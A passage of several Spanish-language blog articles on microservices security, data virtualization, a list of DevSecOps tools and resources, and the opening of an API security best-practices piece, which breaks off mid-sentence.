posibles soluciones que debemos tener en cuenta antes de empezar a utilizar microservicios. ### Reutilización del código El uso de códigos compartidos y bibliotecas puede ayudar a impulsar el movimiento a microservicios, pero también puede ser una espada de doble filo. Si eliges usar una solución de código abierto, siempre estarás atado a ese código y a todas sus deficiencias. Por un lado, la reutilización de la tecnología estándar de la industria puede ser algo bueno ya que ya se ha probado y utilizado en todo el mundo. Por otro lado, el uso generalizado de la tecnología estándar puede ser problemática. Si surge una vulnerabilidad del componente , nuestra compañía y otras compañías que están usando la tecnología necesitarán aplicar parches de emergencia para mitigar fallas críticas en todas las aplicaciones. Imagine lo que sería tener que implementar nuevamente todos sus servicios debido a un nuevo paquete de seguridad, o parchear los servidores con un binario completamente nuevo. Este escenario suena como una pesadilla, ¿no? Si tomamos el fallo de Heartbleed, por ejemplo. Cuando se descubrió el error en abril de 2014, aproximadamente el 66% de los servidores web de Internet necesitaban un parche porque el software que incluía las bibliotecas vulnerables se usaba en casi todos los servidores web del mundo. Esta catástrofe requirió el parchado y el reinicio de cientos de miles de servidores en un período de tiempo muy corto. Si tiene una cantidad menor de servidores, las soluciones de implementar todo de nuevo o aplicar parches con un nuevo binario son factibles, ya sea manualmente o con una cantidad básica de scripts. Pero cuando se escala, ya no son opciones viables para resolver este problema. En estos casos se debe tener un método probado y verificado de orquestación para poder realizar operaciones masivas rápidamente para aliviar este tipo de problemas. ### Negación de servicio Asegurarse de que las aplicaciones son seguras no es una hazaña fácil, y administrar una serie de servicios que tienen múltiples puntos de entrada desde el exterior puede ser difícil. A medida que crece la cantidad de servicios, la magnitud de este problema se amplifica. Una gestión adecuada de los grupos de seguridad ayudará a garantizar que solo se expongan los puertos correctos. Si esto se hace, puede ayudar a que nuestras aplicaciones no sufran una gran cantidad de dolores de cabeza y angustias si una parte maliciosa ataca nuestro producto en un ataque. Configurar una aplicación de firewall o una solución alternativa en frente de los sistema puede corregir un problema como este, asegurando que solo el tráfico apropiado llegue a la puerta de entrada de nuestra aplicación y verificando que no contiene códigos maliciosos ni amenazas. ### Tráfico entre microservicios Cada microservicio se pasa información de uno a otro. Cuando el tráfico se encuentra en una parte segregada de nuestra propia red, es seguro asumir que el riesgo de tener un espía se reduce ya que generalmente se encuentra detrás de un cortafuegos corporativo, lo que lo hace menos susceptible a los ataques man-in-the-middle. Cuando te mueves a la cloud, esta suposición ya no es válida. El tráfico entre los microservicios debe estar encriptado en cloud. Esto significa que, además de los microservicios que manejan el tráfico cifrado, también nos deberán asegurarse que el rendimiento de las aplicaciones subyacentes no sufra como resultado del trabajo adicional que se debe realizar con el cifrado y descifrado de la información. Hay una serie de métodos que se pueden usar para mitigar este problema. Una de esas soluciones es la creación de una nube privada virtual (VPC), que nos permitirá segregar las cargas de trabajo en la nube sin permitir que un intruso malintencionado ingrese al sistema y pueda espiar el tráfico. Sin embargo, esta no es una solución infalible, y todavía tiene una serie de vectores de ataque que deberemos abordar. Otra opción es descargar el cifrado a un servicio externo (por ejemplo, un servicio de equilibrio de carga) que habilitará la protección del tráfico con una interrupción mínima o cambios en el sistema actual. ### Seguridad en los secretos compartidos Para asegurarnos que los microservicios no estén abiertos al mundo, te sugiero agregar autenticación entre los servicios de los sistemas. Hacer esto asegurará que solo las piezas correctas puedan hablar entre ellas y que tengan las credenciales adecuadas para hacerlo. Incrustar estos secretos en sus aplicaciones es una muy mala idea. Las mejores prácticas para la arquitectura moderna recomiendan no almacenar ninguna credencial en los servidores. Por supuesto, esto plantea la cuestión de cómo permitirá que las aplicaciones se autentiquen entre sí y con servicios de terceros si las credenciales no se pueden almacenar localmente. Hay algunas formas de abordar este problema. Una estrategia es usar herramientas de terceros o las herramientas y servicios que ya están disponibles en la mayoría de los proveedores cloud. El concepto es muy simple. Cuando inicia una solicitud de autenticación, le solicita a otro servicio que solicite un conjunto temporal de credenciales en su nombre, lo que le permite acceder durante un período de tiempo determinado. Esto resuelve el problema de la longevidad de las credenciales porque expiran después de un cierto período de tiempo, y porque no hay credenciales que estén incrustadas en el microservicio en sí. ### Seguridad en todos los ámbitos Es muy poco probable que aquellos que están produciendo el microservicio en realidad pertenezcan a un solo equipo. Tiene sentido que cada equipo desarrolle, pruebe y despliegue su propio microservicio (o conjunto de ellos). Por lo tanto, la responsabilidad de proteger el servicio no puede recaer únicamente en un único equipo y organización de seguridad operacional tradicional: debe recaer en todos los equipos que producen el software. Para garantizar que una empresa esté protegida y protegida de atacantes externos, es recomendable que considere algún tipo de asociación entre el equipo tradicional de OPSEC y los desarrolladores ( Ya he hablado de los DevSecOps). Establecer dicha asociación ayudará a los participantes a trabajar juntos para que el software que están produciendo sea seguro por defecto, reforzado y probado continuamente para verificar el cumplimiento de una línea base de requisitos de seguridad antes de su paso a producción. Cuando la responsabilidad también recae en los equipos que están creando el servicio, su nivel de compromiso y conciencia aumentará considerablemente. ### Cambios en el código El último problema que abordaremos es el ciclo de vida de la aplicación. Nadie escribe software que sea 100 por ciento perfecto la primera vez, siempre habrá algunos errores que arreglar antes de que el software funcione tan eficientemente como se supone que debe hacerlo. Por ejemplo, la base de la metodología ágil se reitera todo el tiempo, proporcionando solo el producto mínimo viable y mejorando a medida que avanza en el proyecto. Cuando se trata de microservicios, puede haber varios cambios cada día. Cuando actualicemos nuestra aplicación cambiando o agregando funcionalidades, deberemos asegurarnos de que el código sea (como mínimo) el mismo que antes, o incluso mejor. Esto requiere escanear el código agregado para detectar vulnerabilidades y debilidades antes de implementar el código. Debiendo vincular esto a los procesos de integración continua para que se realice como parte del proceso de lanzamiento. ### Seguridad en los microservicios El mantenimiento de un sistema seguro suele ser una tarea desalentadora, y con el cambio a microservicios, hay un vector adicional que se debe abordarse. Cada microservicio tiene sus puntos débiles respectivos que deben protegerse, reforzarse y controlarse continuamente en busca de vulnerabilidades. El alcance de esta tarea no debe subestimarse: a medida que crece el uso de la arquitectura de microservicio, los problemas de seguridad se vuelven más importantes y urgentes. Para protegerse y proteger nuestra empresa, se deben abordar estos problemas de seguridad de manera temprana y de una forma continua. > La seguridad de los microservicios acaba de empezar --- # Data Virtualization, sencillez y seguridad del Big Data URL: https://ciberseguridad.blog/data-virtualization-sencillez-y-seguridad-del-big-data/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-11-14 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > La virtualización de datos extrae datos de múltiples fuentes dispares creando una capa de datos virtual unificada que proporciona a los usuarios un fácil acceso a los datos fuente subyacentes Desde la adopción generalizada de las computadoras en los negocios hace más de cincuenta años, ha habido una necesidad de que las compañías integrasenn datos de diferentes sistemas para propósitos como informes, análisis o desarrollo de aplicaciones. En los últimos años, con la adopción generalizada de aplicaciones móviles y sobre todo la adopción Cloud, las empresas se encontraron apoyando una cantidad cada vez mayor de fuentes de datos (silos) y formatos dispares. Keith Block, COO de Salesforce, mencionó recientemente: > "El 90% de los datos mundiales se crearon en los últimos 12 meses". Ante las demandas de la administración, los usuarios y las autoridades reguladoras de informar o acceder a esta información dispar de manera unificada, los departamentos de IT a menudo adoptaron el enfoque expedito de escribir código o usar conectores para integrar las fuentes de datos dispares requeridas y responder a estas solicitudes. Por ejemplo un informe o una aplicación particular es un ejemplo popular, donde a menudo se siguen agregando solicitudes de datos adicionales. Esto se traduce en un significativo incremento de mano de obra adicional, que consume mucho tiempo, resultando en un drenaje excesivo de los recursos TI. Abrumados por estas numerosas demandas, los departamentos de TI a menudo consideraron necesario retrasar la respuesta, creando un retraso que resultó en una cantidad de interesados cada vez más frustrada. Una solución que surgió a principios de la década de 1990 fue el data warehouse: un repositorio central de datos construido a partir de fuentes de datos dispares de negocio. Esto representaba una arquitectura estrechamente unida ya que todos los datos dispares se almacenaban físicamente y se reconciliaban en un repositorio. Con una sola fuente de datos integrados, fue mucho más fácil para TI satisfacer las necesidades de informes de la empresa. A pesar de lo significativo de este avance, se ponen de manifiesto las deficiencias del enfoque del data warehouse: - La creación de un almacén de datos requiere grandes gastos para configurar lo que es una base de datos relacional enorme, física y redundante. Un componente principal de este proceso fue extraer, transformar y cargar ("ETL") los datos de las fuentes de datos heterogéneos en el almacén de datos. - Se necesitó tiempo y recursos de TI significativos para cuidar y alimentar un data warehouse. Si las fuentes de datos se actualizaban con frecuencia, el proceso de ETL debía volver a ejecutarse regularmente para mantener sincronizados los datos en el data warehouse. - No todos los datos de una empresa se almacenaron en el almacén de datos. Si un informe exigía una nueva fuente de datos, se requería que el departamento de TI dedicara tiempo para integrarlo en el almacén de datos. - Los datos contenidos en un data warehouse no estaban disponibles en tiempo real, lo que afectó la velocidad y la calidad de la decisión al aprovechar esos datos. El retorno de los datos extraídos de un data warehouse solo estaba actualizada como la última vez que se actualizaron los datos del almacén. La virtualización de datos surgió como una tecnología para abordar las deficiencias de la codificación manual y la tecnología de almacenamiento de datos para acceder a los datos de fuentes de datos dispares de una manera integrada. ## ¿Que es la virtualización de datos? La tecnología de virtualización de datos está ganando impulso rápidamente y está mejorando radicalmente la productividad de los usuarios y desarrolladores para acceder a las fuentes de datos distribuidos de su compañía para la integración de datos, creación de informes y análisis, y desarrollo de aplicaciones. Es un método ágil que permite el acceso en tiempo real a fuentes de datos dispares en toda la empresa (en las instalaciones y en cloud) en una fracción del tiempo y a una fracción del coste de los enfoques tradicionales. Para aquellos que no estén familiarizados con el término, la siguiente es una definición estándar para la virtualización de datos: > "La virtualización de datos extrae datos de múltiples fuentes dispares creando una capa de datos virtual unificada que proporciona a los usuarios un fácil acceso a los datos fuente subyacentes". [Imagen: Virtual Data Layer Big Data] Para acceder a los datos, un usuario (que puede ser una persona o un programa ) consulta la base de datos virtual y maneja la recuperación de los datos requeridos de las fuentes de datos. Es importante destacar que esta arquitectura débilmente acoplada significa que no hay necesidad de copiar o replicar datos de cada fuente de datos constituyentes a un repositorio como con el almacenamiento de datos. La virtualización de datos brinda la capacidad de transformar las fuentes de datos subyacentes en formas unificadas que los usuarios pueden consumir. También ofrece la capacidad de crear, actualizar o eliminar información en las fuentes de datos en tiempo real. El primer paso es modelar las fuentes de datos seleccionadas para formar parte de la capa de datos virtual en un repositorio de metadatos. Esto significa que la ubicación de las tablas, el tipo de uniones, la seguridad y otras partes clave de información se asignan desde cada origen de datos a un repositorio de metadatos (esencialmente un almacén que almacena conocimientos importantes sobre las fuentes de datos.) El repositorio de metadatos resultante representa efectivamente el ADN de los datos de una compañía y es un mapa detallado sobre cómo localizar todos los datos subyacentes a la capa de datos virtual. Desde aquí, el motor de consulta entra en juego. Cuando se realiza una consulta de datos específicos a la capa de datos virtual, se pasa al motor de consulta que lo alimenta con la información clave extraída del repositorio de metadatos. Esto crea una consulta transformada que tiene la inteligencia incrustada (ubicación, seguridad, lógica comercial, auditoría, etc.) para recuperar los datos requeridos de las fuentes de datos subyacentes. El motor de consultas tiene la capacidad de manejar sin problemas las consultas que requieren recopilar datos de dos o más orígenes de datos dispares al unirlas, en tiempo real, en un único conjunto de resultados para que el usuario final parezca como si tratara con una base de datos virtual. El resultado final es que, desde la perspectiva del usuario, la capa de datos virtual proporciona un acceso sin interrupciones a los datos subyacentes como si fuera una base de datos virtual sin necesidad de lidiar con la complejidad de integrar cada fuente de datos. De hecho, un desarrollador ni siquiera necesita saber dónde están almacenados o ubicados los datos. [Imagen: Data Virtualization Queries Big Data] ## Virtualización de datos VS enfoques tradicionales para la integración de datos Un ejemplo de integración de datos sería una empresa que desea mejorar el valor derivado del aprovechamiento de su aplicación CRM utilizada por sus representantes de servicio al cliente para gestionar e interactuar con los clientes. Quiere agregar datos importantes de su aplicación de automatización de marketing y nueva aplicación de marketing en redes sociales, de modo que los representantes puedan tener una visión más integral de un cliente al hablar con ellos. Las discusiones que siguen exploran las diferencias entre el enfoque tradicional de escribir el código y los conectores necesarios para lograr la integración y el uso de la vitalización de datos. El enfoque tradicional sería la codificación manual. Esto requeriría el seguimiento de un desarrollador: - Familiarizarse con el modelo de datos de cada fuente de datos. - Ser experto en el entorno de desarrollo de cada aplicación (es decir, Ruby on Rails, .Net, Java, etc.) - Para escribir código que integra cada nueva aplicación a la aplicación existente. Esto incluiría el modelado de datos para determinar la forma óptima en que se integrarán las tres fuentes de datos. También requeriría tener en cuenta consideraciones tales como el formato, la seguridad, la lógica comercial, etc. para integrar correctamente cada fuente de datos. - Para probar e implementar el código desarrollado y asegurarse de que esté libre de errores y cumpla con los requisitos. El enfoque de codificación manual funciona claramente y representaría una relación cableada entre las aplicaciones. Sin embargo, hay ciertas deficiencias: - Como se describió anteriormente, para integrar correctamente estas dos aplicaciones mediante codificación manual, se requieren cantidades significativas de tiempo y habilidad por parte de un desarrollador. - Si es necesario agregar o eliminar una nueva fuente de datos en el futuro, será necesario volver a codificarla y volver a probarla y consumirá tiempo adicional de desarrollador para implementarla. Es esta inversión requerida en el tiempo lo que lleva a que las iniciativas se retrasen y atrasen las TI. No es de extrañar que, por lo general, el 80% del tiempo y el gasto de TI se dediquen a "abrir la tienda" frente a trabajar para mejorar el negocio. - La integración codificada a mano es frágil, lo que significa que es probable que se rompa cuando haya cambios / actualizaciones en el futuro de cualquier software al que esté conectado. Donde el aumento del tiempo de inactividad se convierte en una frustración para los usuarios. - Para manejar la seguridad, se requeriría unificar la seguridad de cada aplicación con un modelo de seguridad ad hoc que un desarrollador puede o no tener la habilidad y el tiempo para hacerla robusta. La codificación manual crea muchos caminos entre la aplicación existente y las aplicaciones que se integran. Más vías equivalen a más posibilidades de errores de seguridad. - Si hay un error y la aplicación se rompe, todo lo que se producirá es un error de ejecución. No habrá identificación del tipo de error o su ubicación. Un desarrollador tendrá que trabajar a través de muchas capas (registros del sistema, datos brutos, etc.) en diferentes aplicaciones para resolver el problema antes de poder curarlo. Si el desarrollador que escribió el código no ha proporcionado la documentación adecuada o ha abandonado la empresa, esto se vuelve aún más problemático. [Imagen: Difference hand coding data virtualization big data] Alternativamente, con la virtualización de datos, las bases de datos que subyacen tanto a la automatización del marketing como a las aplicaciones de redes sociales se modelarán e incluirán esto en la capa de datos virtual. Una capa de datos virtual superior podría completarse en días. La capa final de datos virtuales requiere trabajar con los administradores para determinar cómo quieren modelar los datos. La aplicación de servicio al cliente existente se integrará con la capa de datos virtual, lo que permitirá recuperar datos de cada una de las aplicaciones. Esto tiene múltiples beneficios, tales como: - Integración fácil: No es necesario tratar con las complejidades y la carga de trabajo de la codificación manual como se describió anteriormente. Si los requisitos de la aplicación cambian y se necesitan nuevas fuentes de datos, la capa de datos virtuales puede acceder rápidamente a ellos sin volver a escribir el código. - Estabilidad mejorada: Una capa de datos virtual puede adaptarse a los cambios en el software que ocurren de forma natural a lo largo del tiempo debido a cosas tales como el lanzamiento de nuevas versiones. - Mejor identificación de errores y cambios: Una capa de datos virtual proporciona notificaciones específicas de errores o cualquier cambio en sus fuentes de datos. Esto incluye la descripción de la naturaleza y ubicación del cambio. Permitiendo que un programador identifique y resuelva rápidamente un problema al hacer que una aplicación vuelva a funcionar más rápido. - Seguridad superior: La capa de datos virtual proporciona un solo punto de acceso a todas las fuentes de datos subyacentes y recupera datos directamente de una fuente de datos sin necesidad de tocar varias capas de middleware como con la codificación manual. El acceso de los usuarios se puede controlar estrictamente en grano fino o grano grueso. Autenticación, autorización y capacidades de auditoría estarian todas incluidas. - Enfoque estándar: La virtualización de datos requiere un proceso estructurado para integrar los datos. Esto significa código consistente y la capacidad de depurar de manera efectiva. También toma la variabilidad del estilo de programación de cada desarrollador fuera de la ecuación. - Validación del sistema: En caso de que se produzcan cambios en el esquema de las fuentes de datos, los cambios de esquema se pueden validar proactivamente con la capa de datos virtual. El componente de validación informa sobre cualquier característica que ya no funciona. - Ahorro significativo: Por todas las razones mencionadas anteriormente, se puede ahorrar mucho dinero y tiempo de desarrollador utilizando la virtualización de datos. Los ahorros se acumulan no solo en la configuración inicial sino en el mantenimiento continuo. Algunas empresas han experimentado ahorros estimados en más del 80% en comparación con los enfoques tradicionales. Beneficios exponenciales al integrar múltiples fuentes de datos: Existe un argumento de peso para la integración de una codificación única y simple de fuente de datos siendo el mejor enfoque. Con un programador experto, puede hacerse de forma rápida y rentable. Sin embargo, a medida que crece la cantidad de fuentes de datos que deben integrarse y aumenta su complejidad, existen claras ventajas para el uso de la virtualización de datos, ya que todos los beneficios mencionados anteriormente crecen exponencialmente. Es importante destacar que también proporciona una arquitectura muy clara y comprensible en comparación con la codificación manual que puede convertirse rápidamente en un laberinto de código frágil e inmanejable si no se gestiona correctamente. ## Conclusión En conclusión, a medida que las fuentes de datos crecen y se vuelven más complejas dentro de cada empresa, los viejos enfoques para integrar y acceder a los datos están llegando a un muro de rendimiento. La virtualización de datos puede abstraer los datos de los sistemas fuente, lo que permite construir fácilmente una capa de datos virtual compuesta de todas las fuentes de datos. Esto agiliza en gran medida la capacidad de una compañía de acceder y consumir sus datos, al tiempo que ahorra tiempo y dinero considerables. Sin duda, es un enfoque que todo departamento de TI debe considerar seriamente. --- # Las mejores herramientas y recursos DevSecOps URL: https://ciberseguridad.blog/las-mejores-herramientas-y-recursos-devsecops/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-10-27 Actualizado: 2026-09-29 Tema: DevOps > Empieza a evolucionar los DevOps hacia la seguridad, y para ello, esta lista de herramientas y recursos DevSecOps Inspirado por la increíble y creciente tendencia DevOps y tras hablar en su día de los DevSecOps, hoy os traslado una recopilación de documentos, presentaciones, videos, materiales de capacitación, herramientas, servicios e iniciativas generales que respaldan la misión DevSecOps. Lo que traslado en esta recopilación de herramientas y recursos DevSecops son los componentes básicos y los elementos esenciales que pueden ayudar a una organización a trasladar sus actuales DevOps a su evolución con seguridad, los DevSecOps , ayudando a desarrollar su propio programa de seguridad en Devops. Esta lista de herramientas y recursos DevSecops no estaría completamente terminada y cambiará a medida que los DevSecOps maduren, pero pretendemos que sea una lista que crezca y cambie a medida que la comunidad aprenda y mejore cómo se implementa y se adopta DevSecOps. En dicha lista solo encontraremos iniciativas que proporcionen capacidades gratuitas o de código abierto que ayuden con la misión de crear un buen entorno DevSecOps, aunque encontraremos tambien (intentamos que en menor medida ) enlaces que conduzcan a aspecto comerciales. ## Información DevSecOps Hemos estado trabajando para buscar en toda la industria con el fin de traer y obtener más información sobre los diferentes tipos de iniciativas de seguridad de DevOps, y como hemos indicado, hemos obtenido una colección que reune e incluye: Podcasts, videos, presentaciones y otros medios para ayudar a obtener más información sobre DevSecOps, SecDevOps, DevOpsSec y/o DevOps + Security. ### Guias Si bien no es la forma más correcta de hacer las cosas, compartir buenos consejos y buenas recomendaciones puede fortalecer el desarrollo de software. Nuestro objetivo es mejorar estas pautas a través de buenas practicas de desarrollo del código. - Guía de seguridad para desarrolladores web ### Presentaciones Últimamente se ven cada vez mas charlas y cada vez se escucha hablar más y se dirigen al cambio de agregar seguridad en el entorno DevOps. - Veracode defiende la cloud para un hack completo ### Iniciativas Hay una variedad de iniciativas en curso para migrar la seguridad y el cumplimiento a entornos DevOps y para ello, alguno de los proyectos son: - DevSecOps - DevOps Robusto - AWS Labs ### Mantenerse informado Hemos descubierto un tesoro con esta lista de correo y boletines de noticias donde DevSecOps comparten sus habilidades y conocimientos. - Ruby Weekly ### Mapas Wardley de seguridad Una manera de que las personas continúen desarrollando sus capacidades y compartan un entendimiento común es a través del desarrollo de Wardley Maps. He de decir que he descubierto los Wardley Maps hoy mismo y me han parecido maravillosos (Intentaré hacer alguna entrada sobre los mismos, por que me parecieron muy utiles). - Introducción a los mapas de Wardley - SOC Value Chain y modelos de entrega - Vea la Figura 6 para las comparaciones - Ejemplo de industria de seguridad - DevSecOps Repo para mapas de seguridad ## Formación Los DevSecOps requieren de un apetito de aprendizaje y agilidad para adquirir rápidamente nuevas habilidades impresionante. Dentro de las tendencias cambiantes en el mundo IT, es posible que estemos ante una de las que más evoluciona y cambia, por ello hemos recopilado estos enlaces para ayudaros a aprender cómo hacer DevSecOps de la mejor forma posible. ### Laboratorios DevSecOps Los laboratorios son oportunidades prácticas de aprendizaje para desarrollar las habilidades en Dev + Sec + Ops. Todas las habilidades son útiles y deben crecer para que puedan tener empatía, conocimiento y el rodaje de operar el estilo DevSecOps. - Pentester Lab - Infoseclabs - Vulnhub - DevSecOps Bootcamp - Exercism - Monitorización de infraestructura ### Pruebas de vulnerabilidades Es importante acumular conocimiento al aprender a romper aplicaciones que se vuelven vulnerables por errores de seguridad. Esta sección contiene una lista de aplicaciones vulnerables que se pueden implementar para saber qué no hacer. Estas mismas aplicaciones se pueden proteger solucionando las vulnerabilidades intencionadas para aprender cómo evitar que los atacantes accedan a la infraestructura o los datos subyacentes. - Metasploitable (Linux) - Mutillidae (PHP) - NodeGoat (Node) - LambHack (Lambda) - RailsGoat (Rieles) - WebGoatPHP (PHP) - WebGoat (aplicación web) - WebGoat.Net (.NET) ### Conferencias Una muy buena practica de conocimiento para combinar DevOps y Seguridad es entregado a través de conferencias y reuniones. Esta es una breve lista de los lugares que le han dedicado una parte de su agenda a los DevOps o DevSecOps. - AWS re: Inventar - Conferencia RSA - Conferencia Goto - DevSecCon - ISACA Irlanda - DevOps Connect - DevOps Days ### Podcasts Una pequeña colección de podcasts de DevOps y DevSecOps o DevOps implementando seguridad. - DevOps arrestado - Podcast de ingeniería social - Podcast de Sec de confianza - Podcast de seguridad defensiva - Brakeing Down Security - Tenable Security Podcast - Bajo la seguridad Rabbithole - OWASP 24/7 - Podcast de seguridad - DevOps Cafe - Show de lucha de comida - The Ship Show - Negocio riesgoso - El desarrollador seguro ### Libros Estos son algunos libros que se centraron en DevSecOps, los cuales se enfocaron en la seguridad por adelantado. - Holistic Info-Sec para desarrolladores web ## Herramientas DevSecOps Esta colección de herramientas es útil para establecer una plataforma DevSecOps. Hemos dividido las herramientas en varias categorías que te ayudaran con las diferentes tareas y procesos DevSecOps. ### Dashboards La visualización es un elemento importante para identificar, compartir y desarrollar la información de seguridad que pasa desde el inicio del proceso creativo hasta las operaciones. - Kibana - Grafana ### Automatización Las plataformas de automatización tienen la ventaja de proporcionar soluciones de corrección cuando surgen defectos de seguridad, o ser capaces de controlar los despliegues y donde fallan los mismos. - StackStorm ### Caza Esta lista de herramientas proporciona las capacidades necesarias para encontrar anomalías de seguridad e identificar reglas que deben ser automatizadas y ampliadas para soportar las demandas de escala. - Mirador - osquery - OSSEC - GRR - MozDef - moloch - osxcollector - mig ### Pruebas Las pruebas son un elemento esencial de un programa DevSecOps porque ayuda a preparar a los equipos para operaciones difíciles y para determinar los defectos de seguridad antes de que puedan ser explotados. - Gauntlt - Chef Inspec - Snyk - Node Security Platform - npm-obsoleto - npm-check - RetireJS - Hakiri - Brakeman - OWASP ZAP - OSS Fuzz - IronWASP - RIPS - Infer - OWASP OWTF - Lynis ### Alerta Una vez que descubra algo importante, el tiempo de respuesta es crítico y esencial para la Respuesta ante incidentes requerida para remediar un defecto o problema de seguridad, y por eso os expongo algunos de los proyectos que prevén Alertas y Notificaciones. - Elastalert - 411 - Alerta ### Threat Intelligence Hay muchas fuentes de inteligencia de amenazas en el mundo. Algunos de estos provienen de IP Intelligence y otros de repositorios de malware. Ya vimos las mejores herramientas y recursos de inteligencia de amenazas , pero hoy os expongo algunos más concreto. - OpenTPX - Pasivo Total - Critical Stack - Feeds IntelMQ ### Modelado de ataque DevSecOps requiere una capacidad de modelado de ataque común que se pueda hacer a velocidad y escala. Afortunadamente, hay esfuerzos y proyectos en marcha para crear estas útiles taxonomías que nos ayuden a operacionalizar los modelos de ataque y las defensas. - CAPEC - Modelado de amenazas de Larry Osterman - STIX - SeaSponge ### Gestión secreta Para respaldar la seguridad como el código, las credenciales y secretos confidenciales deben administrarse, protegerse, mantenerse y rotarse mediante la automatización. Los siguientes proyectos brindan a los equipos de DevOps algunas buenas opciones para proteger los detalles confidenciales utilizados en la creación e implementación de implementaciones full stack de software. - Vault - BlackBox - Transcrypt - Keybase - Secretos de Git ### Red Team DevSecOps Estas son herramientas que hemos encontrado útiles durante los ejercicios Red Team y War Game. Los proyectos en esta sección ayudan con el reconocimiento, el desarrollo de exploits y otras actividades comunes dentro de Kill Chain. - Sabueso - EyeWitness ### Visualización Hacer los descubrimientos de DevSecOps ya es bastante difícil con todas las API y herramientas de línea de comandos. Esta lista proporciona herramientas para visualizar el trabajo, ya sea a través de diagramas de flujo, gráficos o mapas. - Gephi - ShadowBuster ### Compartir Una colección de herramientas para ayudar a compartir el conocimiento y contar la historia. - Speaker Deck - Gitbook ### ChatOps Uno de los cambios más importantes que puede hacer en su organización es la comunicación sin fronteras o boundaryless communications. La configuración de ChatOps puede permitir que todos se reúnan y resuelvan problemas. En esta parte, a mi me gusta mucho Microsoft Team, pero va asociado a las licencias de O365. - Gitter - Flojo - HipChat - Riot > Los DevOps ya han venido para quedarse, ahora es tu misión evolucionar la seguridad de los mismo. --- # Mejores practicas para la seguridad en APIs URL: https://ciberseguridad.blog/mejores-practicas-para-la-seguridad-en-apis/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-10-12 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > La seguridad API REST va a ser uno de los principales focos de ciber seguridad de los próximos años. ¡Empieza a aplicar las mejores practicas! Los interfaces de programación de aplicaciones (API) se han convertido en la moda de la actualidad, los desarrolladores de las empresas ahora dependen en gran medida de las mismas para apoyarse en la entrega de nuevos productos y servicios. Esto no es ninguna sorpresa, ya que permiten a los programadores integrar la funcionalidad de los servicios prestados de forma externa en lugar de tener que construir esas funciones ellos mismos. Mientras que las interconexiones ofrecidas por APIs han existido desde que se escribieron los primeros programas, el paisaje está cambiando con los contenedores "dockers" y el desarrollo de aplicaciones móviles. Podemos ver la inmensidad del mundo API a traves de ProgrammableWeb que tiene un directorio con una lista de aproximadamente 15,000 APIs usadas en aplicaciones móviles y web. > Las aplicaciones legacy están siendo reestructuradas, las empresas están rompiendo el software en pedazos más pequeños, y cada vez más aplicaciones están siendo conectadas a nuevos frontends móviles a través de APIs. (Steve Willmott - Director ejecutivo de la API 3scale) Sin embargo, con el aumento de las APIs también viene un incremento en el potencial de más agujeros de seguridad, lo que significa que los desarrolladores deben entender el riesgo de mantener seguros los datos corporativos y de los clientes. Los desafíos comienzan con las listas de prioridades de los programadores. Los desarrolladores se centran más en elementos como la funcionalidad y la agilidad que en la propia seguridad. En consecuencia, las empresas necesitan directrices para garantizar que sus implementaciones API no tienen problemas de seguridad, y por ello os muestro estas ocho prácticas esenciales en seguridad de APIs. ## 1. Reconocer los riesgos de las APIs Cuando los desarrolladores trabajan con APIs, se enfocan en un pequeño conjunto de servicios con el objetivo de que el conjunto de características sea lo más robusto posible, tendiendo a pensar "inside the box". Los desafíos surgen porque hoy en día los extremos delanteros y los extremos traseros están vinculados a una mezcolanza de componentes, donde los hackers piensan "out the box", examinando maneras en que una puerta de entrada de aquí o de allí puede usarse para propósitos nefastos.Mediante el uso de APIs, las empresas pueden inadvertidamente abrir la puerta a todos sus datos corporativos, como hemos podido comprobar hace unas horas con una brecha en los datos de Accenture atraves de una mala configuración de sus APIs de AWS. ## 2. Las APIs son difíciles de usar El desarrollo de software se ha enfrentado a una espada de doble filo recientemente. Los DevOps han hecho la asignación de recursos más simple y más rápido, pero al mismo tiempo, el número de conexiones ha aumentado y el diseño de los sistemas se ha vuelto más complejo. Las APIs admiten literalmente miles de conexiones posibles. Estar bajo presión para lanzar nuevas versiones lo antes posible, hace que los programadores bien intencionados y responsables a veces se apresuren y cometan errores. De hecho, los investigadores de la Universidad de Virginia descubrieron que incluso cuando los desarrolladores siguen los procedimientos de programación aceptados, entregan código inseguro. El grupo probó tres conjuntos de aplicaciones, incluidas las aplicaciones de cliente en la Windows 8 App Store, que utilizaban varias secuencias de comandos de medios sociales y determinó que entre el 67 y el 86 por ciento de las aplicaciones tenían vulnerabilidades de seguridad que podrían comprometer los datos de los usuarios. ## 3. Supervisar cuidadosamente el software complementario La sofisticación de las APIs crea otros problemas. Un uso popular de las interfaces es permitir a terceros escribir aplicaciones complementarias para una plataforma. Las soluciones móviles y los programas de redes sociales, como Facebook, dependen de otros para agregar valor a su sistema base. Un "bugicidio" potencial es que tales interfaces suelen dar a los desarrolladores un alto nivel de derechos de autorización (funcionalidad de administrador del sistema en algunos casos), donde los piratas informáticos codiciaran esos privilegios y tratarán vorazmente de desenterrar tales vulnerabilidades del sistema. ## 4. Trabajar con juicio las normas Los proveedores han estado trabajando en estándares para mejorar la seguridad de las APIs y facilitar las implementaciones, pero los resultados han sido variados. OAuth de Internet Engineering Task Force es un estándar de autorización abierto, diseñado para proporcionar a los clientes acceso restringido seguro a los recursos del sistema sin compartir sus credenciales. El estándar se utiliza comúnmente como una forma para que los usuarios de Internet inicien sesión en sitios web de terceros a través de sus cuentas de Microsoft, Google, Facebook o Twitter. Pero los problemas pueden surgir porque el estándar se basa en HTTP, que tiene fallas, y las APIs proporcionan un punto de explotación atractivo. Los metadatos API proporcionan toda la superficie de ataque de una API, facilitando a los hackers el conocimiento o la detección de posibles vulnerabilidades Entonces, ¿qué tipo de ataques pueden ocurrir? Desafortunadamente, la lista es larga. El Open Web Application Security Project (OWASP), un consorcio ad hoc centrado en mejorar la seguridad del software, expone las vulnerabilidades más comunes de la API, incluyendo inyecciones de SQL / scripts y vulnerabilidades de autenticación. ## 5. Enfocar la autorización y autenticación en los Front Ends Las APIs no viven solas. Los desarrolladores unen estos elementos en otras piezas de software. Asegurar el código correctamente requiere que los desarrolladores adopten un enfoque multidimensional. Esto comienza con la autenticación sólida, que es el proceso de comprobar si una persona es quien dice ser. Las empresas se han estado alejando de los sistemas de contraseña simple a hacia una autenticación de varios pasos con un énfasis creciente en las soluciones biométricas como son las huellas dactilares. Una vez que la persona es autenticada, necesitan pasar un chequeo de autorización para tener acceso a diferentes tipos de información. Por ejemplo, pocos empleados necesitan acceso a los datos de nóminas, pero 